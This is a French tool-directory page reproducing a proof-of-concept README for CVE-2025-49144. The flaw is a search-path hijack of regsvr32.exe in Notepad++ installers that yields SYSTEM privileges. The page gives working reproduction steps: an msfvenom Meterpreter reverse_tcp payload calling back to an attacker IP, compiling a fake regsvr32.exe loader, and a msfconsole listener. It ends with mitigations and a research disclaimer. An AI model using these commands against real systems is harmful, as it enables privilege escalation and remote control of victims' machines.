Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-49144_PoC — CVE-2025-49144 PoC pour les chercheurs en sécurité afin de tester et d'essayer. | Kitploit
Outils/GitHubGitHub/thetorjancaptain/cve-2025-49144_poc
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationMouvement LatéralTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges UtilesExploitation de Binaires

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
thetorjancaptain/cve-2025-49144_poc

CVE-2025-49144_PoC

CVE-2025-49144 PoC pour les chercheurs en sécurité afin de tester et d'essayer.

Voir le dépôt
882850il y a 1 anVérifié par Kitploit

CVE-2025-49144_PoC

PoC Flow

📌 CVE-2025-49144 est une vulnérabilité d'élévation de privilèges locaux de haute sévérité trouvée dans les installateurs de Notepad++ v8.8.1 et versions antérieures. Cette vulnérabilité provient d'un comportement de recherche de chemin exécutable non contrôlé lors de l'installation, permettant à un attaquant local d'obtenir des privilèges de niveau SYSTEM en plaçant des exécutables malveillants dans le même répertoire que l'installateur.


⚙️ Comment fonctionne la CVE – Étape par étape :

🧱 1. Qu'est-ce qui a mal fonctionné dans l'installateur ?

L'installateur de Notepad++ (avant v8.8.2) appelle regsvr32.exe pour enregistrer certains composants — mais il le fait sans donner le chemin complet (comme C:\Windows\System32\regsvr32.exe).

Au lieu de cela, il exécute simplement :

root@kitploit:~
regsvr32.exe some_dll

📂 2. Comportement du chemin de recherche de Windows :

Lorsqu'un exécutable est lancé sans chemin complet, Windows utilise un ordre de recherche spécifique pour trouver le fichier :

  1. Le dossier à partir duquel l'application a été lancée (par exemple, Téléchargements)

  2. Le dossier système (System32)

  3. Le dossier Windows

  4. Le répertoire de travail actuel

  5. Les chemins dans la variable d'environnement PATH

Ainsi, si un faux regsvr32.exe est placé dans le même dossier que l'installateur (par exemple, Téléchargements), Windows l'utilisera avant le vrai.

💣 3. Exploitation :

root@kitploit:~
- L'attaquant place un regsvr32.exe malveillant dans le même dossier que l'installateur légitime de Notepad++ (par exemple, le dossier Téléchargements de la victime).

- La victime exécute l'installateur (pensant qu'il est sûr).

- L'installateur appelle regsvr32.exe, mais finit par exécuter le malveillant à partir du même dossier — avec des privilèges SYSTEM (car les installateurs demandent généralement des permissions administrateur).

- La charge utile de l'attaquant s'exécute maintenant en tant que NT AUTHORITY\SYSTEM.

⚙️ Étapes pour reproduire :

  1. Obtenir le code shell :
root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=4444 -f c > shellcode.txt
  1. Téléchargez le fichier 'regsvr32_loader.c' et éditez-le.
  2. Collez l'intégralité du shellcode de shellcode.txt dans le commentaire mentionné.
  3. Compilez pour obtenir regsvr32.exe :
root@kitploit:~
x86_64-w64-mingw32-gcc regsvr32_loader.c -o regsvr32.exe -mwindows
  1. Déployez un écouteur meterpreter :
root@kitploit:~
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST X.X.X.X
set LPORT 4444
run
  1. Téléchargez une version vulnérable de Notepad++, c'est-à-dire antérieure à 8.8.1 car 8.8.1 est maintenant mis à jour automatiquement. Pour la PoC, j'ai utilisé Notepad++ v8.6.8
  2. Déplacez le fichier 'regsvr32.exe' dans le système Windows dans le même dossier que l'installateur de Notepad++, probablement dans le dossier Téléchargements.
  3. Terminez l'installation de l'installateur de Notepad++.

Note : Il s'agit d'une PoC donc testée avec Windows Defender et la protection en temps réel désactivées.


✅ Atténuation

Les utilisateurs et administrateurs devraient :

  • Mettez à jour vers Notepad++ v8.8.2 ou version ultérieure

  • Limitez l'installation de logiciels aux administrateurs de confiance

  • Utilisez AppLocker, WDAC ou des stratégies de restriction de logiciels (SRP) pour :

    • Bloquer l'exécution depuis les dossiers accessibles en écriture par l'utilisateur (par exemple, Téléchargements)
    • Empêcher l'exécution de binaires non fiables comme regsvr32.exe depuis des chemins non autorisés
    • Appliquer la signature de code pour les exécutables

Les équipes de sécurité devraient auditer régulièrement les chemins d'installation, surveiller les permissions d'écriture et observer le comportement lors de l'exécution des installateurs pour réduire la surface d'attaque.


🏷️ Licence

Licence MIT — Gratuit à des fins éducatives, de recherche et défensives uniquement.


🤝 Contribution

Les pull requests sont les bienvenues — améliorer la détection, ajouter des fonctionnalités ou suggérer des correctifs.


⚠️ Avertissement

Cette PoC est uniquement à des fins éducatives et de recherche. Utilisez-la à vos propres risques. L'auteur n'est pas responsable de toute mauvaise utilisation ou des dommages causés.

Télécharger l’outil